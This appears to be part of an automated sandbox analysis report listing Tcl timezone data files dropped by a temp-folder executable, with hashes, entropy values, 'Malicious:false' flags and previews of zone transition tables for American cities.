                                                                                                                                                                                                                                                                                                                                SHA-512:B04B5DAB30384FF05ABFC235DA4F9BFE96F400076DEB7CBBA0938F93E66BFF5E86B18E95E9BC0448D812722C8F2D4AFD78AC75180FD80D992F96DFA0CEC156AC
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Curacao) {. {-9223372036854775808 -16547 0 LMT}. {-1826738653 -16200 0 -0430}. {-157750200 -14400 0 AST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1089
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.793747183330894
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQZefXQgiu2kPIw1Dtc7UXxH9vC0gdtiyW8RWK79ET7cSXKIuXvY:52XQgiu2kgw1DtuyxdvC0gdtiyW8RB7S
                                                                                                                                                                                                                                                                                                                                MD5:E83072C1351121C5CFD74E110ECA9B4B
                                                                                                                                                                                                                                                                                                                                SHA1:360B468851EBFF266E4A8F40FE5D196BC6809E65
                                                                                                                                                                                                                                                                                                                                SHA-256:6A12AD52CBCF0B3F8BB449C7BC51A784BE560F4BD13545D04426E76B2511D8F9
                                                                                                                                                                                                                                                                                                                                SHA-512:539C53AA1D02E3AABF65873CA830782697AC9D55EC6694B68B95C325608F8703882B1182215D2B4E2B6066784AC880BCF0F4EBC5A72B2E637BD9B2C3A61D2979
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Danmarkshavn) {. {-9223372036854775808 -4480 0 LMT}. {-1686091520 -10800 0 -03}. {323845200 -7200 0 -02}. {338950800 -10800 0 -03}. {354675600 -7200 1 -02}. {370400400 -10800 0 -03}. {386125200 -7200 1 -02}. {401850000 -10800 0 -03}. {417574800 -7200 1 -02}. {433299600 -10800 0 -03}. {449024400 -7200 1 -02}. {465354000 -10800 0 -03}. {481078800 -7200 1 -02}. {496803600 -10800 0 -03}. {512528400 -7200 1 -02}. {528253200 -10800 0 -03}. {543978000 -7200 1 -02}. {559702800 -10800 0 -03}. {575427600 -7200 1 -02}. {591152400 -10800 0 -03}. {606877200 -7200 1 -02}. {622602000 -10800 0 -03}. {638326800 -7200 1 -02}. {654656400 -10800 0 -03}. {670381200 -7200 1 -02}. {686106000 -10800 0 -03}. {701830800 -7200 1 -02}. {717555600 -10800 0 -03}. {733280400 -7200 1 -02}. {749005200 -10800 0 -03}. {764730000 -7200 1 -02}. {780454800 -10800 0
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7609
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.785302701923574
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:nxr+C2ZCHtffWsBNwj/lpmlOxGcKcnRH31t+ucgge:nx/Nf+aNwj/lpmlOxnKcndIG
                                                                                                                                                                                                                                                                                                                                MD5:4DBA9C83ECAD5B5A099CC1AA78D391B0
                                                                                                                                                                                                                                                                                                                                SHA1:FFCC77D7964BD16BD8A554FB437BCF4F2FC8958E
                                                                                                                                                                                                                                                                                                                                SHA-256:3A89A6834DDBE4A3A6A1CB8C1A1F9579259E7FD6C6C55DE21DCD4807753D8E48
                                                                                                                                                                                                                                                                                                                                SHA-512:21212AFE8917C0F3BBED433B510C4FCE671B0DA887A1C7338A18CD5409B1A95E766510A9E636E5AA3AB0BA21D7D2C00A462FEBB10D4567A343B85AFE6A3E2394
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Dawson) {. {-9223372036854775808 -33460 0 LMT}. {-2188996940 -32400 0 YST}. {-1632056400 -28800 1 YDT}. {-1615125600 -32400 0 YST}. {-1596978000 -28800 1 YDT}. {-1583164800 -32400 0 YST}. {-880203600 -28800 1 YWT}. {-769395600 -28800 1 YPT}. {-765381600 -32400 0 YST}. {-147884400 -25200 1 YDDT}. {-131554800 -32400 0 YST}. {315561600 -28800 0 PST}. {325677600 -25200 1 PDT}. {341398800 -28800 0 PST}. {357127200 -25200 1 PDT}. {372848400 -28800 0 PST}. {388576800 -25200 1 PDT}. {404902800 -28800 0 PST}. {420026400 -25200 1 PDT}. {436352400 -28800 0 PST}. {452080800 -25200 1 PDT}. {467802000 -28800 0 PST}. {483530400 -25200 1 PDT}. {499251600 -28800 0 PST}. {514980000 -25200 1 PDT}. {530701200 -28800 0 PST}. {544615200 -25200 1 PDT}. {562150800 -28800 0 PST}. {576064800 -25200 1 PDT}. {594205200 -28800 0 PST}. {607514400 -25200 1 PDT}
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1876
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9458112723626755
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQ4eJ58IlJ14RsT8X+km8VnynhBZ2c4Y+O4A5W5xDICW2n7oZA8QZFaIOvkty1H2:5DH0yIRkf12fZGJ5LB6xfZ89Y
                                                                                                                                                                                                                                                                                                                                MD5:D7E4978775F290809B7C042674F46903
                                                                                                                                                                                                                                                                                                                                SHA1:E94DB1EBB6A1594ED1A5AEA48B52395482D06085
                                                                                                                                                                                                                                                                                                                                SHA-256:2E6CFFE8E0C1FE93F55B1BD01F96AA1F3CE645BC802C061CB4917318E30C4494
                                                                                                                                                                                                                                                                                                                                SHA-512:1FF3CD58A4C4DEC7538F0816E93E6577C51B0045CF36190FF4D327E81FB8282ADDB0EF20BD78A838ABD507EBAD1C187F2A20CC7840E2325B9C326EC449897B45
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Dawson_Creek) {. {-9223372036854775808 -28856 0 LMT}. {-2713881544 -28800 0 PST}. {-1632060000 -25200 1 PDT}. {-1615129200 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-725817600 -28800 0 PST}. {-715788000 -25200 1 PDT}. {-702486000 -28800 0 PST}. {-684338400 -25200 1 PDT}. {-671036400 -28800 0 PST}. {-652888800 -25200 1 PDT}. {-639586800 -28800 0 PST}. {-620834400 -25200 1 PDT}. {-608137200 -28800 0 PST}. {-589384800 -25200 1 PDT}. {-576082800 -28800 0 PST}. {-557935200 -25200 1 PDT}. {-544633200 -28800 0 PST}. {-526485600 -25200 1 PDT}. {-513183600 -28800 0 PST}. {-495036000 -25200 1 PDT}. {-481734000 -28800 0 PST}. {-463586400 -25200 1 PDT}. {-450284400 -28800 0 PST}. {-431532000 -25200 1 PDT}. {-418230000 -28800 0 PST}. {-400082400 -25200 1 PDT}. {-386780400 -28800 0 PST}. {-
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8629
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.76966035849006
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:4cGbc2sGm+4I1zXN+C2mWBNQMsmNTxf6AeO+cblX:4c2dVUC2mWBNwWTxyWR
                                                                                                                                                                                                                                                                                                                                MD5:F641A7F5DE8FCF4ADC1E5A1A2C9DEC53
                                                                                                                                                                                                                                                                                                                                SHA1:B013EBBE8002C91C0C45A2D389245A1A9194077A
                                                                                                                                                                                                                                                                                                                                SHA-256:DF5459068DB3C771E41BE8D62FB89A2822CB2A33CF9A5640C6C666AB20ECE608
                                                                                                                                                                                                                                                                                                                                SHA-512:C2EA07FF21FD6D1A45A87C6AD85DD3929C2B56E66A52D23103DDFF7B2B3B6433EC5EBFC17BED0F9C0A9AF036F0DF965E12EA3D4463207A128AEF5F6BC12970D7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Denver) {. {-9223372036854775808 -25196 0 LMT}. {-2717643600 -25200 0 MST}. {-1633273200 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1601823600 -21600 1 MDT}. {-1583683200 -25200 0 MST}. {-1577898000 -25200 0 MST}. {-1570374000 -21600 1 MDT}. {-1551628800 -25200 0 MST}. {-1538924400 -21600 1 MDT}. {-1534089600 -25200 0 MST}. {-883587600 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-757357200 -25200 0 MST}. {-147884400 -21600 1 MDT}. {-131558400 -25200 0 MST}. {-116434800 -21600 1 MDT}. {-100108800 -25200 0 MST}. {-94669200 -25200 0 MST}. {-84380400 -21600 1 MDT}. {-68659200 -25200 0 MST}. {-52930800 -21600 1 MDT}. {-37209600 -25200 0 MST}. {-21481200 -21600 1 MDT}. {-5760000 -25200 0 MST}. {9968400 -21600 1 MDT}. {25689600 -25200 0 MST}. {41418000 -21600 1 MDT}. {57744000 -25200
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8010
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.742999180017181
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:FVzApQaC3Xm8sHRwvOTFhP5S+ijFnRaJeaX1eyDt:FVspQrn+qvOTFhPI1jFIL
                                                                                                                                                                                                                                                                                                                                MD5:177B0815E8BD6BFA6E62895FE12A61E5
                                                                                                                                                                                                                                                                                                                                SHA1:EC2400FA644023D6B3100B52381DB65EAF2606F0
                                                                                                                                                                                                                                                                                                                                SHA-256:402EC5AB0E99EF6EBB33F4D482EEA5198EC686C7EAE75FC4F7D9B4EF4AC0A9E9
                                                                                                                                                                                                                                                                                                                                SHA-512:CFA4226A21FDB23C723335F7385EA15436D8A0752EE50C67DA4C1D839BFFD4792EE9AB6E408498CD06C6B8A99A96E95E0B591F7EA17B41C1895ED396438C6D5A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Detroit) {. {-9223372036854775808 -19931 0 LMT}. {-2051202469 -21600 0 CST}. {-1724083200 -18000 0 EST}. {-883594800 -18000 0 EST}. {-880218000 -14400 1 EWT}. {-769395600 -14400 1 EPT}. {-765396000 -18000 0 EST}. {-757364400 -18000 0 EST}. {-684349200 -14400 1 EDT}. {-671047200 -18000 0 EST}. {94712400 -18000 0 EST}. {104914800 -14400 1 EDT}. {120636000 -18000 0 EST}. {126687600 -14400 1 EDT}. {152085600 -18000 0 EST}. {157784400 -18000 0 EST}. {167814000 -14400 0 EDT}. {183535200 -18000 0 EST}. {199263600 -14400 1 EDT}. {215589600 -18000 0 EST}. {230713200 -14400 1 EDT}. {247039200 -18000 0 EST}. {262767600 -14400 1 EDT}. {278488800 -18000 0 EST}. {294217200 -14400 1 EDT}. {309938400 -18000 0 EST}. {325666800 -14400 1 EDT}. {341388000 -18000 0 EST}. {357116400 -14400 1 EDT}. {372837600 -18000 0 EST}. {388566000 -14400 1 EDT}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):203
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.856609165175433
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290TL3290e/:MBaIMY9QpI290Tr290O
                                                                                                                                                                                                                                                                                                                                MD5:F85ADC16127A74C9B35D16C631E11F4F
                                                                                                                                                                                                                                                                                                                                SHA1:F7716E20F546AA04697FB0F4993A14BAFDD1825E
                                                                                                                                                                                                                                                                                                                                SHA-256:67ACF237962E3D12E0C746AEDC7CDBC8579DC7C0A7998AC6B6E169C58A687C17
                                                                                                                                                                                                                                                                                                                                SHA-512:89E8F9DC6A306912B2DAEE77705E2DCD76E32F403352C23ED6BE34F8BEBB12C3604C20DA11DB921553D20E3FC43EC7984C7103D8D1396AB83B104E70BA6D13B1
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/Dominica) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8435
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7724320820194475
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:7tGVgeb0Gm+qI1zXN+C2mWBNQMsmNTxf6AeO+cblX:7heJ/UC2mWBNwWTxyWR
                                                                                                                                                                                                                                                                                                                                MD5:FECBDD64036247B2FBB723ADD8F798F6
                                                                                                                                                                                                                                                                                                                                SHA1:60B1719958AD6151CDB174A319A396D5F48C7CF1
                                                                                                                                                                                                                                                                                                                                SHA-256:EC95041E0A97B37A60EF16A6FA2B6BCB1EBEFABBC9468B828D0F467595132BC2
                                                                                                                                                                                                                                                                                                                                SHA-512:7CF94EC5040F4C8FA3C6ED30CFDAB59A199C18AA0CDA9A66D1A477F15563D2B7CB872CEEF1E2295E0F3B9A85508A03AEC29E3ECEBE11D9B089A92794D510BA00
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Edmonton) {. {-9223372036854775808 -27232 0 LMT}. {-1998663968 -25200 0 MST}. {-1632063600 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1600614000 -21600 1 MDT}. {-1596816000 -25200 0 MST}. {-1567954800 -21600 1 MDT}. {-1551628800 -25200 0 MST}. {-1536505200 -21600 1 MDT}. {-1523203200 -25200 0 MST}. {-1504450800 -21600 1 MDT}. {-1491753600 -25200 0 MST}. {-1473001200 -21600 1 MDT}. {-1459699200 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-715791600 -21600 1 MDT}. {-702489600 -25200 0 MST}. {-84380400 -21600 1 MDT}. {-68659200 -25200 0 MST}. {-21481200 -21600 1 MDT}. {-5760000 -25200 0 MST}. {73472400 -21600 1 MDT}. {89193600 -25200 0 MST}. {104922000 -21600 1 MDT}. {120643200 -25200 0 MST}. {136371600 -21600 1 MDT}. {152092800 -25200 0 MST}. {167821200 -21600 1 MDT}. {183542400
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1189
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7118381376452767
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQOX9eptXyss/u/C5/ukCI/uiCk/u8CHe/uOCXs/um4Co/uN3Cc/ux8CL/uiFCyL:5OXUCs5IlTToo4mdGFtapG8dtedJ9fO2
                                                                                                                                                                                                                                                                                                                                MD5:D6945DF73BA7E12D3B23889CC34F6CFB
                                                                                                                                                                                                                                                                                                                                SHA1:8C1317F3EF82225A14751318DFDA8904F908C457
                                                                                                                                                                                                                                                                                                                                SHA-256:71F15943EAD942224B8807CCBB21F9AE34F04619FD76176404633BDB49D9E88C
                                                                                                                                                                                                                                                                                                                                SHA-512:088C2D7BE44650A044B7632337A1FF8C3CF8A6188F24507C846B9B648FE796466B22D4A322B602B75C2943653FC43C7B9A99AE0AACF9AB7BCC86388EC3953F8A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Eirunepe) {. {-9223372036854775808 -16768 0 LMT}. {-1767208832 -18000 0 -05}. {-1206950400 -14400 1 -05}. {-1191355200 -18000 0 -05}. {-1175367600 -14400 1 -05}. {-1159819200 -18000 0 -05}. {-633812400 -14400 1 -05}. {-622062000 -18000 0 -05}. {-602276400 -14400 1 -05}. {-591825600 -18000 0 -05}. {-570740400 -14400 1 -05}. {-560203200 -18000 0 -05}. {-539118000 -14400 1 -05}. {-531345600 -18000 0 -05}. {-191358000 -14400 1 -05}. {-184190400 -18000 0 -05}. {-155156400 -14400 1 -05}. {-150062400 -18000 0 -05}. {-128890800 -14400 1 -05}. {-121118400 -18000 0 -05}. {-99946800 -14400 1 -05}. {-89582400 -18000 0 -05}. {-68410800 -14400 1 -05}. {-57960000 -18000 0 -05}. {499755600 -14400 1 -05}. {511243200 -18000 0 -05}. {530600400 -14400 1 -05}. {540273600 -18000 0 -05}. {562136400 -14400 1 -05}. {571204800 -18000 0 -05}. {590040000 -18
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):269
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.7060952459188305
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X529078iwTm2OHvJ4YRIgdrV/uFn/acD3/uFn/sVn:MBp5290785mdHx4YlB/uFn/z/uFn/U
                                                                                                                                                                                                                                                                                                                                MD5:77BE2E0759A3B7227B4DAC601A670D03
                                                                                                                                                                                                                                                                                                                                SHA1:1FB09211F291E5B1C5CC9848EB53106AF48EE830
                                                                                                                                                                                                                                                                                                                                SHA-256:40994535FE02326EA9E373F54CB60804BA7AE7162B52EA5F73497E7F72F2D482
                                                                                                                                                                                                                                                                                                                                SHA-512:EB5E6A4A912053E399F6225A02DDC524A223D4A5724165CAD9009F1FA10B042F971E52CE17B395A86BC80FCC6897FD2CCC3B00708506FEF39E4D71812F5DF595
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/El_Salvador) {. {-9223372036854775808 -21408 0 LMT}. {-1546279392 -21600 0 CST}. {547020000 -18000 1 CDT}. {559717200 -21600 0 CST}. {578469600 -18000 1 CDT}. {591166800 -21600 0 CST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):185
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.786739478919165
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0qfSwVAIg20qfo2IAcGE7JM7QIAcGEqfu:SlSWB9IZaM3y7eHVAIgpeo2907390eu
                                                                                                                                                                                                                                                                                                                                MD5:74AB4664E80A145D808CAB004A22859B
                                                                                                                                                                                                                                                                                                                                SHA1:2AF7665C4E155A227B3F76D1C4BC87854C25A6CB
                                                                                                                                                                                                                                                                                                                                SHA-256:BDD0893AA5D170F388B1E93CE5FE2EDF438866707E52033E49898AFC499F86C5
                                                                                                                                                                                                                                                                                                                                SHA-512:CCC2E75E07BA1CAAFD1149A22D07668D191594272922AA2A1CE6DE628A8FF49AD90AA8BFE75C005328820C700B991AD87A6F40DEB5AD519B2708D8F7BF04E5A0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Tijuana)]} {. LoadTimeZoneFile America/Tijuana.}.set TZData(:America/Ensenada) $TZData(:America/Tijuana).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4427
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8109873978594053
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5aIl06OIRkf12fZGJ5LB6xfZ89Cf5udCLA9ZClqs/K+ff0t9:sIlWf/5LB6xR89C8CgZCHtffW9
                                                                                                                                                                                                                                                                                                                                MD5:90BBD338049233FAC5596CC63AA0D5B6
                                                                                                                                                                                                                                                                                                                                SHA1:D96282F5B57CBF823D5A1C1FDDE7907B74DAD770
                                                                                                                                                                                                                                                                                                                                SHA-256:DD21597BA97FD6591750E83CC00773864D658F32653017C4B52285670FFE52E3
                                                                                                                                                                                                                                                                                                                                SHA-512:3B0F5801E55EBBB7B4C0F74DDBD3469B8F4C2BFC1B44CC80B0D36DA2152C837C8176695945F61FA75664C04F1266BCA0564815307A2C27E783CD3348C4451E4A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Fort_Nelson) {. {-9223372036854775808 -29447 0 LMT}. {-2713880953 -28800 0 PST}. {-1632060000 -25200 1 PDT}. {-1615129200 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-757353600 -28800 0 PST}. {-725817600 -28800 0 PST}. {-715788000 -25200 1 PDT}. {-702486000 -28800 0 PST}. {-684338400 -25200 1 PDT}. {-671036400 -28800 0 PST}. {-652888800 -25200 1 PDT}. {-639586800 -28800 0 PST}. {-620834400 -25200 1 PDT}. {-608137200 -28800 0 PST}. {-589384800 -25200 1 PDT}. {-576082800 -28800 0 PST}. {-557935200 -25200 1 PDT}. {-544633200 -28800 0 PST}. {-526485600 -25200 1 PDT}. {-513183600 -28800 0 PST}. {-495036000 -25200 1 PDT}. {-481734000 -28800 0 PST}. {-463586400 -25200 1 PDT}. {-450284400 -28800 0 PST}. {-431532000 -25200 1 PDT}. {-418230000 -28800 0 PST}. {-400082400 -25200 1 PDT}. {-3
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):226
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.730673843485836
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y73GK7mFVAIgp3GKBL290HXYAp4903GK1:MBaIMY3GK7Hp3GKBL290Hz4903GK1
                                                                                                                                                                                                                                                                                                                                MD5:4685E4E850E0B6669F72B8E1B4314A0A
                                                                                                                                                                                                                                                                                                                                SHA1:BC6CCD58A2977A1E125B21D7B8FD57E800E624E1
                                                                                                                                                                                                                                                                                                                                SHA-256:D35F335D6F575F95CEA4FF53382C0BE0BE94BE7EB8B1E0CA3B7C50E8F7614E4E
                                                                                                                                                                                                                                                                                                                                SHA-512:867003B33A5FC6E42D546FBFC7A8AB351DE72232B89BA1BEC6DB566F6DCE135E65C08DE9112837190EB21D677E2F83E7E0F6049EC70CB9E36F223DE3A68E000A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Indiana/Indianapolis)]} {. LoadTimeZoneFile America/Indiana/Indianapolis.}.set TZData(:America/Fort_Wayne) $TZData(:America/Indiana/Indianapolis).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1375
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.695923796037783
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQVeVc4h1u80V2dBUGphmC17ewGtN3rvIh0VBHZDIOXqWoN:5b4h19U2dBUGrmO7XGtN3kh0VBHZUwqX
                                                                                                                                                                                                                                                                                                                                MD5:2BCCE3C71898F3D7F2327419950C5838
                                                                                                                                                                                                                                                                                                                                SHA1:CE45568E951C227CB3D88D20B337E5E1E1D4B1EF
                                                                                                                                                                                                                                                                                                                                SHA-256:AA2CF8DA8D63FC4DE912A4F220CF7E49379021F5E51ABA1AFCFC7C9164D5A381
                                                                                                                                                                                                                                                                                                                                SHA-512:420066E5D39446AA53547CBF1A015A4745F02D1059B2530B7735AC4C28BD2BFC431AEB7531C2C49C2BDF8E31405F15717D88DE0DE3F5F42BAA96A8289A014D06
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Fortaleza) {. {-9223372036854775808 -9240 0 LMT}. {-1767216360 -10800 0 -03}. {-1206957600 -7200 1 -03}. {-1191362400 -10800 0 -03}. {-1175374800 -7200 1 -03}. {-1159826400 -10800 0 -03}. {-633819600 -7200 1 -03}. {-622069200 -10800 0 -03}. {-602283600 -7200 1 -03}. {-591832800 -10800 0 -03}. {-570747600 -7200 1 -03}. {-560210400 -10800 0 -03}. {-539125200 -7200 1 -03}. {-531352800 -10800 0 -03}. {-191365200 -7200 1 -03}. {-184197600 -10800 0 -03}. {-155163600 -7200 1 -03}. {-150069600 -10800 0 -03}. {-128898000 -7200 1 -03}. {-121125600 -10800 0 -03}. {-99954000 -7200 1 -03}. {-89589600 -10800 0 -03}. {-68418000 -7200 1 -03}. {-57967200 -10800 0 -03}. {499748400 -7200 1 -03}. {511236000 -10800 0 -03}. {530593200 -7200 1 -03}. {540266400 -10800 0 -03}. {562129200 -7200 1 -03}. {571197600 -10800 0 -03}. {592974000 -7200 1 -03}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8099
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.737123408653655
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:C1V2eXXnqvlrPGgFEUlpde9pXbO53oVmM7IEc2fVGYu2yeB/T/eleWmBk81kS/kQ:CDJv
                                                                                                                                                                                                                                                                                                                                MD5:3A839112950BFDFD3B5FBD440A2981E4
                                                                                                                                                                                                                                                                                                                                SHA1:FFDF034F7E26647D1C18C1F6C49C776AD5BA93ED
                                                                                                                                                                                                                                                                                                                                SHA-256:3D0325012AB7076FB31A68E33EE0EABC8556DFA78FBA16A3E41F986D523858FF
                                                                                                                                                                                                                                                                                                                                SHA-512:1E06F4F607252C235D2D69E027D7E0510027D8DB0EE49CF291C39D6FD010868EF6899437057DA489DD30981949243DDFA6599FD07CE80E05A1994147B78A76CE
                                                                                                                                                                                                                                                                                                                                Malicious:false
